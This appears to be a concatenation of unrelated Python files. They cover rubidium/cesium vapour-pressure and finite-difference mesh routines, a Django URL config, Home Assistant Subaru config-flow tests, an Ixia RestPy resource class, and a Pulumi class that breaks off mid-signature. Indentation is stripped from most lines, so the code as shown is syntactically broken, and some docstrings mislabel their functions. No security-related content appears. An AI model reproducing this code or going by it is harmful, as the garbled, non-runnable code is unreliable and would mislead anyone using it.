def sech_mode(t, fwhm):
r"""Return a hyperbolic secant mode."""
a = fwhm/2/np.log(1+np.sqrt(2))
return 1/np.cosh(t/a)/np.sqrt(2*a)
def heaviside_theta(x, a=None):
u"""The Heaviside Pi function.
⎧ 1 for x >= 0
Θ(x) = ⎨
⎩ 0 otherwise
"""
if isinstance(x, Basic):
if a is None:
return Piecewise(*[(1, x >= 0), (0, True)])
else:
return Piecewise(*[(1, x > 0), (a, x == 0), (0, True)])
return np.where(x >= 0, 1.0, 0.0)
def heaviside_pi(x):
u"""The Heaviside Pi function.
⎧ 1 for |x| <= 1/2
Π(x) = ⎨
⎩ 0 otherwise
"""
if isinstance(x, Basic):
        return Piecewise(*[(1, Abs(x) <= Rational(1, 2)), (0, True)])
return np.where(np.abs(x) <= 0.5, 1.0, 0.0)
def heaviside_lambda(t):
u"""The Heaviside Lambda function.
⎧ 1 - |t| for |t| < 1
Λ(t) = ⎨
⎩ 0 otherwise
"""
if hasattr(t, "__getitem__"):
return np.where(np.abs(t) < 1, 1-np.abs(t), 0.0)
return Piecewise((1 - Abs(t), Abs(t) < 1),
(0, True))
def num_integral(f, dt):
"""We integrate using the trapezium rule."""
if hasattr(dt, "__getitem__"):
dt = dt[1]-dt[0]
    F = sum(f[1:-1])
    F += (f[0] + f[-1])*0.5
return np.real(F*dt)
##############################################################################
# Alkali vapour routines.
def vapour_pressure(params):
r"""Return the vapour pressure of rubidium or cesium in Pascals.
    It receives as input a dictionary with the temperature in Kelvins
    ("Temperature") and the name of the element ("element").
    >>> print(vapour_pressure({"Temperature": 25.0 + 273.15, "element": "Rb"}))
    5.31769896107e-05
    >>> print(vapour_pressure({"Temperature": 39.3 + 273.15, "element": "Rb"}))
    0.000244249795696
    >>> print(vapour_pressure({"Temperature": 90.0 + 273.15, "element": "Rb"}))
    0.0155963687128
    >>> print(vapour_pressure({"Temperature": 25.0 + 273.15, "element": "Cs"}))
    0.000201461144963
    >>> print(vapour_pressure({"Temperature": 28.5 + 273.15, "element": "Cs"}))
    0.000297898928349
    >>> print(vapour_pressure({"Temperature": 90.0 + 273.15, "element": "Cs"}))
    0.0421014384667
    The element must be in the database.
    >>> print(vapour_pressure({"Temperature": 90.0 + 273.15, "element": "Ca"}))
    Traceback (most recent call last):
    ...
    ValueError: Ca is not an element in the database for this function.
References:
[1] Daniel A. Steck, "Cesium D Line Data," available online at
http://steck.us/alkalidata (revision 2.1.4, 23 December 2010).
[2] Daniel A. Steck, "Rubidium 85 D Line Data," available online at
http://steck.us/alkalidata (revision 2.1.5, 19 September 2012).
[3] Daniel A. Steck, "Rubidium 87 D Line Data," available online at
http://steck.us/alkalidata (revision 2.1.5, 19 September 2012).
"""
Temperature = params["Temperature"]
element = params["element"]
if element == "Rb":
Tmelt = 39.30+273.15 # K.
if Temperature < Tmelt:
P = 10**(2.881+4.857-4215.0/Temperature) # Torr.
else:
P = 10**(2.881+4.312-4040.0/Temperature) # Torr.
elif element == "Cs":
Tmelt = 28.5 + 273.15 # K.
if Temperature < Tmelt:
P = 10**(2.881+4.711-3999.0/Temperature) # Torr.
else:
P = 10**(2.881+4.165-3830.0/Temperature) # Torr.
else:
s = str(element)
s += " is not an element in the database for this function."
raise ValueError(s)
P = P * 101325.0/760.0 # Pascals.
return P
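# Worked example: for Rb at 25 C (298.15 K, below the melting point) the solid
# branch gives P = 10**(2.881 + 4.857 - 4215.0/298.15) Torr ~ 3.99e-7 Torr, and
# 3.99e-7 * 101325.0/760.0 ~ 5.32e-5 Pa, matching the first doctest above.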
def vapour_number_density(params):
r"""Return the number of atoms in a rubidium or cesium vapour in m^-3.
    It receives as input a dictionary with the temperature in Kelvins
    ("Temperature") and the name of the element ("element").
    >>> print(vapour_number_density({"Temperature": 90.0 + 273.15, "element": "Cs"}))
    8.39706962725e+18
"""
Temperature = params["Temperature"]
return vapour_pressure(params)/k_B/Temperature
def rayleigh_range(params):
r"""Return the Rayleigh range for signal and control."""
ws = params["w1"]
wc = params["w1"]
lams = c/(params["omega21"]/2/np.pi)
lamc = c/(params["omega32"]/2/np.pi)
return np.pi*ws**2/lams, np.pi*wc**2/lamc
##############################################################################
# Finite difference miscellaneous routines.
def build_t_mesh(params, uniform=True, return_bounds=False):
r"""Build a variable density mesh for the time axis.
    We ensure that within two fwhm of each control pulse there is a
    hundredth of the points, or at least 100 of them.
"""
Nfwhms = 2.0
Nleast = 100
fra = 0.01
Nt = params["Nt"]
T = params["T"]
t0w = params["t0w"]
t0r = params["t0r"]
tauw = params["tauw"]
taur = params["taur"]
if uniform:
return np.linspace(-T/2, T/2, Nt)
# We determine how many points go in each control field region.
Nw = int(fra*Nt); Nr = int(fra*Nt)
if Nw < Nleast: Nw = Nleast
if Nr < Nleast: Nr = Nleast
# The density outside these regions should be uniform.
Trem = T - Nfwhms*tauw - Nfwhms*taur
Nrem = Nt - Nw - Nr
t01 = 0.0; tf1 = t0w-Nfwhms*tauw/2
t02 = t0w+Nfwhms*tauw/2; tf2 = t0r-Nfwhms*taur/2
t03 = t0r+Nfwhms*taur/2; tf3 = T
T1 = tf1 - t01
T2 = tf2 - t02
T3 = tf3 - t03
N1 = int(Nrem*T1/Trem)
N2 = int(Nrem*T2/Trem)
N3 = int(Nrem*T3/Trem)
# We must make sure that these numbers all add up to Nt
Nt_wrong = N1-1 + Nw + N2-2 + Nr + N3-1
# print N1, Nw, N2, Nr, N3
# print Nt, Nt_wrong
# We correct this error:
N2 = N2 + Nt - Nt_wrong
Nt_wrong = N1-1 + Nw + N2-2 + Nr + N3-1
tw = np.linspace(t0w - Nfwhms*tauw/2, t0w + Nfwhms*tauw/2, Nw)
tr = np.linspace(t0r - Nfwhms*taur/2, t0r + Nfwhms*taur/2, Nr)
t1 = np.linspace(t01, tf1, N1)
t2 = np.linspace(t02, tf2, N2)
t3 = np.linspace(t03, tf3, N3)
t = np.zeros(Nt)
t[:N1-1] = t1[:-1]
a1 = 0; b1 = N1-1
aw = b1; bw = aw+Nw
a2 = bw; b2 = a2+N2-2
ar = b2; br = ar+Nr
a3 = br; b3 = a3+N3-1
t[a1:b1] = t1[:-1]
t[aw:bw] = tw
t[a2:b2] = t2[1:-1]
t[ar:br] = tr
t[a3:b3] = t3[1:]
# print t[a1:b1].shape, t[aw:bw].shape, t[a2:b2].shape, t[ar:br].shape,
# print t[a3:b3].shape
if return_bounds:
return (a1, aw, a2, ar, a3)
return t
def build_Z_mesh(params, uniform=True):
r"""Return a Z mesh for a given cell length and number of points."""
L = params["L"]
Nz = params["Nz"]
Z = np.linspace(-L/2, L/2, Nz)
return Z
def build_mesh_fdm(params, verbose=0):
r"""Build mesh for the FDM in the control field region.
We choose a mesh such that the region where the cell overlaps with the
control field has approximately `N**2` points, the time and space
steps satisfy approximately dz/dtau = c/2, and length in time of the mesh
is duration `params["T"]*ntau`.
"""
tauw = params["tauw"]
ntauw = params["ntauw"]
N = params["N"]
Z = build_Z_mesh(params)
D = Z[-1] - Z[0]
# We calculate NtOmega and Nz such that we have approximately
# NtOmega*Nz = N**2
NtOmega = int(round(N*np.sqrt(c*ntauw*tauw/2/D)))
Nz = int(round(N*np.sqrt(2*D/c/ntauw/tauw)))
dt = ntauw*tauw/(NtOmega-1)
# We calculate a t0w that is approximately at 3/2*ntauw*tauw + 2*D/c
Nt1 = int(round((ntauw*tauw + 2*D/c)/dt))+1
t01 = 0.0; tf1 = t01 + (Nt1-1)*dt
t02 = tf1; tf2 = t02 + (NtOmega-1)*dt
t03 = tf2; tf3 = t03 + (Nt1-1)*dt
t0w = (tf2 + t02)/2
t01 -= t0w; tf1 -= t0w
t02 -= t0w; tf2 -= t0w
t03 -= t0w; tf3 -= t0w
t0w = 0.0
tau1 = np.linspace(t01, tf1, Nt1)
tau2 = np.linspace(t02, tf2, NtOmega)
tau3 = np.linspace(t03, tf3, Nt1)
Nt = 2*Nt1 + NtOmega - 2
T = tf3-t01
tau = np.linspace(t01, tf3, Nt)
Z = build_Z_mesh(params)
params_new = params.copy()
params_new["Nt"] = Nt
params_new["Nz"] = Nz
params_new["T"] = T
params_new["t0w"] = t0w
params_new["t0s"] = t0w
Z = build_Z_mesh(params_new)
if verbose > 0:
Nt1 = tau1.shape[0]
Nt2 = tau2.shape[0]
Nt3 = tau3.shape[0]
T1 = tau1[-1] - tau1[0]
T2 = tau2[-1] - tau2[0]
T3 = tau3[-1] - tau3[0]
T1_tar = ntauw*tauw + 2*D/c
# dt1 = tau1[1] - tau1[0]
# dt2 = tau2[1] - tau2[0]
# dt3 = tau3[1] - tau3[0]
aux1 = Nt1+Nt2+Nt3-2
total_size = aux1*Nz
aux2 = [Nt1, Nt2, Nt3, Nz, aux1, Nz, total_size]
mes = "Grid size: ({} + {} + {} - 2) x {} = {} x {} = {} points"
print(mes.format(*aux2))
aux2 = [total_size, 4*total_size**2]
mes = "The W matrix for the full grid would be"
mes += ": (2 x {})^2 = {} points"
print(mes.format(*aux2))
dz = Z[1]-Z[0]
dt = tau[1]-tau[0]
ratio1 = float(NtOmega)/float(Nz)
ratio2 = float(Nz)/float(NtOmega)
mes = "The control field region has {} x {} = {} =? {} = {}^2 points"
print(mes.format(Nt2, Nz, Nt2*Nz, N**2, N))
mes = "The W matrix for the control region would be "
mes += "(2 x {})^2 = {} points"
aux = Nt2*Nz
print(mes.format(aux, 4*aux**2))
mes = "The ratio of steps is (dz/dt)/(c/2) = {:.3f}"
print(mes.format(dz/dt/(c/2)))
aux = [T1/tauw, T2/tauw, T3/tauw]
mes = "T1/tauw, T3/tauw, T3/tauw : {:.3f}, {:.3f}, {:.3f}"
print(mes.format(*aux))
mes = "T1/T1_tar, T3/T1_tar: {:.3f}, {:.3f}"
print(mes.format(T1/T1_tar, T3/T1_tar))
if total_size > 1.3e6:
mes = "The mesh size is larger than 1.3 million, the computer"
mes += " might crash!"
warnings.warn(mes)
if ratio1 > 15:
mes = "There are too many t-points in the control region: {}"
mes = mes.format(NtOmega)
warnings.warn(mes)
if ratio2 > 15:
mes = "There are too many Z-points in the control region, "
mes = "the computer might crash!"
warnings.warn(mes)
if Nz > 500:
mes = "There are too many Z-points! I'll prevent this from "
mes += "crashing."
raise ValueError(mes)
return params_new, Z, tau, tau1, tau2, tau3
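if __name__ == "__main__":
    # A minimal self-check sketch (not part of the library): num_integral uses
    # the trapezium rule, so integrating sin over [0, pi] on a fine mesh should
    # print a value very close to 2.
    _t = np.linspace(0.0, np.pi, 1001)
    print(num_integral(np.sin(_t), _t))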
|
"""globus URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.conf import settings
from django.conf.urls.static import static
from django.contrib import admin
from django.conf.urls import handler404, handler500
from django.urls import include, path
urlpatterns = [
path('', include('afisha.urls')),
path('admin/', admin.site.urls),
path('auth/', include('django.contrib.auth.urls')),
path('about/', include('about.urls')),
]
handler404 = 'afisha.views.page_not_found' # noqa
handler500 = 'afisha.views.server_error' # noqa
if settings.DEBUG:
import debug_toolbar
urlpatterns += (path('__debug__/', include(debug_toolbar.urls)),)
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
urlpatterns += static(settings.STATIC_URL,
document_root=settings.STATIC_ROOT)
|
from dataclasses import dataclass
from bindings.csw.simple_literal import SimpleLiteral
__NAMESPACE__ = "http://purl.org/dc/elements/1.1/"
@dataclass
class Description2(SimpleLiteral):
"""An account of the content of the resource.
Examples of Description include, but are not limited to, an
abstract, table of contents, reference to a graphical representation
of content, or free-text account of the content.
"""
class Meta:
name = "description"
namespace = "http://purl.org/dc/elements/1.1/"
|
from time import sleep
from typing import Sequence, Iterator, Callable, TypeVar, Iterable
from typhoon.core import SKIP_BATCH
T = TypeVar('T')
def branch(branches: Sequence[T], delay: int = 0) -> Iterable[T]:
"""
Yields each item in the sequence with an optional delay
:param branches:
:param delay:
:return:
"""
for i, b in enumerate(branches):
if delay and i > 0:
sleep(delay)
yield b
# noinspection PyShadowingBuiltins
def filter(data: T, filter_func: Callable[[T], bool]) -> Iterator:
"""
Send data if the result of applying filter_func on it is True
:param data: Any kind of data
:param filter_func: A function that evaluates data and returns a boolean value
:return:
"""
yield data if filter_func(data) else SKIP_BATCH
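# Example usage (a sketch): list(branch(['a', 'b', 'c'])) -> ['a', 'b', 'c'],
# and list(filter(3, lambda x: x > 2)) -> [3], while a failing predicate yields
# [SKIP_BATCH] so that, as the name of typhoon.core.SKIP_BATCH suggests, the
# batch is skipped downstream.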
|
import pprint
import sys
import os.path
sys.path.append(os.getcwd())
this_dir = os.path.dirname(__file__)
from lib.fast_rcnn.train import get_training_roidb, train_net
from lib.fast_rcnn.config import cfg_from_file, get_output_dir, get_log_dir
from lib.datasets.factory import get_imdb
from lib.networks.factory import get_network
from lib.fast_rcnn.config import cfg
if __name__ == '__main__':
cfg_from_file('ctpn/text.yml')
print('Using config:')
pprint.pprint(cfg)
imdb = get_imdb('voc_2007_trainval')
print('Loaded dataset `{:s}` for training'.format(imdb.name))
roidb = get_training_roidb(imdb)
output_dir = get_output_dir(imdb, None)
log_dir = get_log_dir(imdb)
print('Output will be saved to `{:s}`'.format(output_dir))
print('Logs will be saved to `{:s}`'.format(log_dir))
device_name = '/gpu:0'
print(device_name)
network = get_network('VGGnet_train')
train_net(network, imdb, roidb,
output_dir=output_dir,
log_dir=log_dir,
pretrained_model='data/pretrain/VGG_imagenet.npy',
max_iters=int(cfg.TRAIN.max_steps),
restore=bool(int(cfg.TRAIN.restore)))
|
"""Tests for the Subaru component config flow."""
# pylint: disable=redefined-outer-name
from copy import deepcopy
from unittest import mock
from unittest.mock import patch
import pytest
from subarulink.exceptions import InvalidCredentials, InvalidPIN, SubaruException
from homeassistant import config_entries
from homeassistant.components.subaru import config_flow
from homeassistant.components.subaru.const import CONF_UPDATE_ENABLED, DOMAIN
from homeassistant.const import CONF_DEVICE_ID, CONF_PIN
from homeassistant.setup import async_setup_component
from .conftest import (
MOCK_API_CONNECT,
MOCK_API_IS_PIN_REQUIRED,
MOCK_API_TEST_PIN,
MOCK_API_UPDATE_SAVED_PIN,
TEST_CONFIG,
TEST_CREDS,
TEST_DEVICE_ID,
TEST_PIN,
TEST_USERNAME,
)
from tests.common import MockConfigEntry
ASYNC_SETUP_ENTRY = "homeassistant.components.subaru.async_setup_entry"
async def test_user_form_init(user_form):
"""Test the initial user form for first step of the config flow."""
assert user_form["description_placeholders"] is None
assert user_form["errors"] is None
assert user_form["handler"] == DOMAIN
assert user_form["step_id"] == "user"
assert user_form["type"] == "form"
async def test_user_form_repeat_identifier(hass, user_form):
"""Test we handle repeat identifiers."""
entry = MockConfigEntry(
domain=DOMAIN, title=TEST_USERNAME, data=TEST_CREDS, options=None
)
entry.add_to_hass(hass)
with patch(
MOCK_API_CONNECT,
return_value=True,
) as mock_connect:
result = await hass.config_entries.flow.async_configure(
user_form["flow_id"],
TEST_CREDS,
)
assert len(mock_connect.mock_calls) == 0
assert result["type"] == "abort"
assert result["reason"] == "already_configured"
async def test_user_form_cannot_connect(hass, user_form):
"""Test we handle cannot connect error."""
with patch(
MOCK_API_CONNECT,
side_effect=SubaruException(None),
) as mock_connect:
result = await hass.config_entries.flow.async_configure(
user_form["flow_id"],
TEST_CREDS,
)
assert len(mock_connect.mock_calls) == 1
assert result["type"] == "abort"
assert result["reason"] == "cannot_connect"
async def test_user_form_invalid_auth(hass, user_form):
"""Test we handle invalid auth."""
with patch(
MOCK_API_CONNECT,
side_effect=InvalidCredentials("invalidAccount"),
) as mock_connect:
result = await hass.config_entries.flow.async_configure(
user_form["flow_id"],
TEST_CREDS,
)
assert len(mock_connect.mock_calls) == 1
assert result["type"] == "form"
assert result["errors"] == {"base": "invalid_auth"}
async def test_user_form_pin_not_required(hass, user_form):
"""Test successful login when no PIN is required."""
with patch(MOCK_API_CONNECT, return_value=True,) as mock_connect, patch(
MOCK_API_IS_PIN_REQUIRED,
return_value=False,
) as mock_is_pin_required, patch(
ASYNC_SETUP_ENTRY, return_value=True
) as mock_setup_entry:
result = await hass.config_entries.flow.async_configure(
user_form["flow_id"],
TEST_CREDS,
)
assert len(mock_connect.mock_calls) == 1
assert len(mock_is_pin_required.mock_calls) == 1
assert len(mock_setup_entry.mock_calls) == 1
expected = {
"title": TEST_USERNAME,
"description": None,
"description_placeholders": None,
"flow_id": mock.ANY,
"result": mock.ANY,
"handler": DOMAIN,
"type": "create_entry",
"version": 1,
"data": deepcopy(TEST_CONFIG),
}
expected["data"][CONF_PIN] = None
result["data"][CONF_DEVICE_ID] = TEST_DEVICE_ID
assert result == expected
async def test_pin_form_init(pin_form):
"""Test the pin entry form for second step of the config flow."""
expected = {
"data_schema": config_flow.PIN_SCHEMA,
"description_placeholders": None,
"errors": None,
"flow_id": mock.ANY,
"handler": DOMAIN,
"step_id": "pin",
"type": "form",
"last_step": None,
}
assert pin_form == expected
async def test_pin_form_bad_pin_format(hass, pin_form):
"""Test we handle invalid pin."""
with patch(MOCK_API_TEST_PIN,) as mock_test_pin, patch(
MOCK_API_UPDATE_SAVED_PIN,
return_value=True,
) as mock_update_saved_pin:
result = await hass.config_entries.flow.async_configure(
pin_form["flow_id"], user_input={CONF_PIN: "abcd"}
)
assert len(mock_test_pin.mock_calls) == 0
assert len(mock_update_saved_pin.mock_calls) == 1
assert result["type"] == "form"
assert result["errors"] == {"base": "bad_pin_format"}
async def test_pin_form_success(hass, pin_form):
"""Test successful PIN entry."""
with patch(MOCK_API_TEST_PIN, return_value=True,) as mock_test_pin, patch(
MOCK_API_UPDATE_SAVED_PIN,
return_value=True,
) as mock_update_saved_pin, patch(
ASYNC_SETUP_ENTRY, return_value=True
) as mock_setup_entry:
result = await hass.config_entries.flow.async_configure(
pin_form["flow_id"], user_input={CONF_PIN: TEST_PIN}
)
assert len(mock_test_pin.mock_calls) == 1
assert len(mock_update_saved_pin.mock_calls) == 1
assert len(mock_setup_entry.mock_calls) == 1
expected = {
"title": TEST_USERNAME,
"description": None,
"description_placeholders": None,
"flow_id": mock.ANY,
"result": mock.ANY,
"handler": DOMAIN,
"type": "create_entry",
"version": 1,
"data": TEST_CONFIG,
}
result["data"][CONF_DEVICE_ID] = TEST_DEVICE_ID
assert result == expected
async def test_pin_form_incorrect_pin(hass, pin_form):
"""Test we handle invalid pin."""
with patch(
MOCK_API_TEST_PIN,
side_effect=InvalidPIN("invalidPin"),
) as mock_test_pin, patch(
MOCK_API_UPDATE_SAVED_PIN,
return_value=True,
) as mock_update_saved_pin:
result = await hass.config_entries.flow.async_configure(
pin_form["flow_id"], user_input={CONF_PIN: TEST_PIN}
)
assert len(mock_test_pin.mock_calls) == 1
assert len(mock_update_saved_pin.mock_calls) == 1
assert result["type"] == "form"
assert result["errors"] == {"base": "incorrect_pin"}
async def test_option_flow_form(options_form):
"""Test config flow options form."""
assert options_form["description_placeholders"] is None
assert options_form["errors"] is None
assert options_form["step_id"] == "init"
assert options_form["type"] == "form"
async def test_option_flow(hass, options_form):
"""Test config flow options."""
result = await hass.config_entries.options.async_configure(
options_form["flow_id"],
user_input={
CONF_UPDATE_ENABLED: False,
},
)
assert result["type"] == "create_entry"
assert result["data"] == {
CONF_UPDATE_ENABLED: False,
}
@pytest.fixture
async def user_form(hass):
"""Return initial form for Subaru config flow."""
return await hass.config_entries.flow.async_init(
config_flow.DOMAIN, context={"source": config_entries.SOURCE_USER}
)
@pytest.fixture
async def pin_form(hass, user_form):
"""Return second form (PIN input) for Subaru config flow."""
with patch(MOCK_API_CONNECT, return_value=True,), patch(
MOCK_API_IS_PIN_REQUIRED,
return_value=True,
):
return await hass.config_entries.flow.async_configure(
user_form["flow_id"], user_input=TEST_CREDS
)
@pytest.fixture
async def options_form(hass):
"""Return options form for Subaru config flow."""
entry = MockConfigEntry(domain=DOMAIN, data={}, options=None)
entry.add_to_hass(hass)
await async_setup_component(hass, DOMAIN, {})
return await hass.config_entries.options.async_init(entry.entry_id)
|
"""
Triangle Numbers on Python
git-repository: https://github.com/360macky/seqCodes
author: Marcelo A.S.
"""
print("Triangle Numbers")
# Ask for the number of terms
n = int(input("Enter the number of terms of the triangular number sequence: "))
i = 1
while i <= n:
    z = i*(i+1)//2
    print(z)
    i += 1
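# For example, with n = 5 this prints the first five triangular numbers:
# 1, 3, 6, 10, 15.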
|
class UnregisteredExperimentException(Exception):
"""Unregistered Experiment.
Thrown when experiment is not registered in the provided experiment path.
"""
def __init__(self, message, errors=None):
super().__init__(message)
self.errors = errors
class FieldException(Exception):
"""Field Exception.
Thrown when there is an exception relating to experimental fields.
"""
def __init__(self, message, errors=None):
super().__init__(message)
self.errors = errors
class UnregisteredFieldException(FieldException):
"""Unregistered Field.
Thrown when field is not registered in the provided field path.
"""
def __init__(self, message, errors=None):
super().__init__(message)
self.errors = errors
class InvalidExperimentException(Exception):
"""Invalid Experiment Exception.
Thrown when providing experiment data in the incorrect format.
"""
def __init__(self, message, errors=None):
super().__init__(message)
self.errors = errors
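# Example usage (a sketch with hypothetical messages):
#   raise UnregisteredExperimentException(
#       'experiment "foo" is not registered',
#       errors=['searched /path/to/experiments'])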
|
# MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from uhd_restpy.base import Base
from uhd_restpy.files import Files
class RsvpRROSubObjectsList(Base):
"""Rsvp RRO Sub-Objects
The RsvpRROSubObjectsList class encapsulates a list of rsvpRROSubObjectsList resources that are managed by the system.
A list of resources can be retrieved from the server using the RsvpRROSubObjectsList.find() method.
"""
__slots__ = ()
_SDM_NAME = 'rsvpRROSubObjectsList'
_SDM_ATT_MAP = {
'BandwidthProtection': 'bandwidthProtection',
'CType': 'cType',
'Count': 'count',
'DescriptiveName': 'descriptiveName',
'GlobalLabel': 'globalLabel',
'Ip': 'ip',
'Label': 'label',
'LocalIp': 'localIp',
'Name': 'name',
'NodeProtection': 'nodeProtection',
'ProtectionAvailable': 'protectionAvailable',
'ProtectionInUse': 'protectionInUse',
'Type': 'type',
}
def __init__(self, parent):
super(RsvpRROSubObjectsList, self).__init__(parent)
@property
def BandwidthProtection(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Bandwidth Protection
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BandwidthProtection']))
@property
def CType(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): C-Type
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['CType']))
@property
def Count(self):
"""
Returns
-------
- number: Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.
"""
return self._get_attribute(self._SDM_ATT_MAP['Count'])
@property
def DescriptiveName(self):
"""
Returns
-------
- str: Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.
"""
return self._get_attribute(self._SDM_ATT_MAP['DescriptiveName'])
@property
def GlobalLabel(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Global Label
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['GlobalLabel']))
@property
def Ip(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): IP
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Ip']))
@property
def Label(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Label
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Label']))
@property
def LocalIp(self):
"""
Returns
-------
- list(str): Local IP
"""
return self._get_attribute(self._SDM_ATT_MAP['LocalIp'])
@property
def Name(self):
"""
Returns
-------
- str: Name of NGPF element, guaranteed to be unique in Scenario
"""
return self._get_attribute(self._SDM_ATT_MAP['Name'])
@Name.setter
def Name(self, value):
self._set_attribute(self._SDM_ATT_MAP['Name'], value)
@property
def NodeProtection(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Node Protection
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['NodeProtection']))
@property
def ProtectionAvailable(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Protection Available
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ProtectionAvailable']))
@property
def ProtectionInUse(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Protection In Use
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ProtectionInUse']))
@property
def Type(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Reservation Style
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Type']))
def update(self, Name=None):
"""Updates rsvpRROSubObjectsList resource on the server.
This method has some named parameters with a type: obj (Multivalue).
The Multivalue class has documentation that details the possible values for those named parameters.
Args
----
- Name (str): Name of NGPF element, guaranteed to be unique in Scenario
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
def find(self, Count=None, DescriptiveName=None, LocalIp=None, Name=None):
"""Finds and retrieves rsvpRROSubObjectsList resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve rsvpRROSubObjectsList resources from the server.
To retrieve an exact match ensure the parameter value starts with ^ and ends with $
By default the find method takes no parameters and will retrieve all rsvpRROSubObjectsList resources from the server.
Args
----
- Count (number): Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.
- DescriptiveName (str): Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.
- LocalIp (list(str)): Local IP
- Name (str): Name of NGPF element, guaranteed to be unique in Scenario
Returns
-------
- self: This instance with matching rsvpRROSubObjectsList resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of rsvpRROSubObjectsList data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the rsvpRROSubObjectsList resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
def get_device_ids(self, PortNames=None, BandwidthProtection=None, CType=None, GlobalLabel=None, Ip=None, Label=None, NodeProtection=None, ProtectionAvailable=None, ProtectionInUse=None, Type=None):
"""Base class infrastructure that gets a list of rsvpRROSubObjectsList device ids encapsulated by this object.
Use the optional regex parameters in the method to refine the list of device ids encapsulated by this object.
Args
----
- PortNames (str): optional regex of port names
- BandwidthProtection (str): optional regex of bandwidthProtection
- CType (str): optional regex of cType
- GlobalLabel (str): optional regex of globalLabel
- Ip (str): optional regex of ip
- Label (str): optional regex of label
- NodeProtection (str): optional regex of nodeProtection
- ProtectionAvailable (str): optional regex of protectionAvailable
- ProtectionInUse (str): optional regex of protectionInUse
- Type (str): optional regex of type
Returns
-------
- list(int): A list of device ids that meets the regex criteria provided in the method parameters
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._get_ngpf_device_ids(locals())
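# Hypothetical usage sketch (not part of the generated file; the parent object
# `rsvp_p2p_ingress_lsps` and the navigation path depend entirely on your NGPF
# configuration and are illustrative only):
# rro_list = rsvp_p2p_ingress_lsps.RsvpRROSubObjectsList.find(Name='^rro-1$')
# print(rro_list.Count, rro_list.LocalIp)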
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['VirtualNetworkGatewayConnection']
class VirtualNetworkGatewayConnection(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
authorization_key: Optional[pulumi.Input[str]] = None,
connection_protocol: Optional[pulumi.Input[Union[str, 'VirtualNetworkGatewayConnectionProtocol']]] = None,
connection_type: Optional[pulumi.Input[Union[str, 'VirtualNetworkGatewayConnectionType']]] = None,
dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,
enable_bgp: Optional[pulumi.Input[bool]] = None,
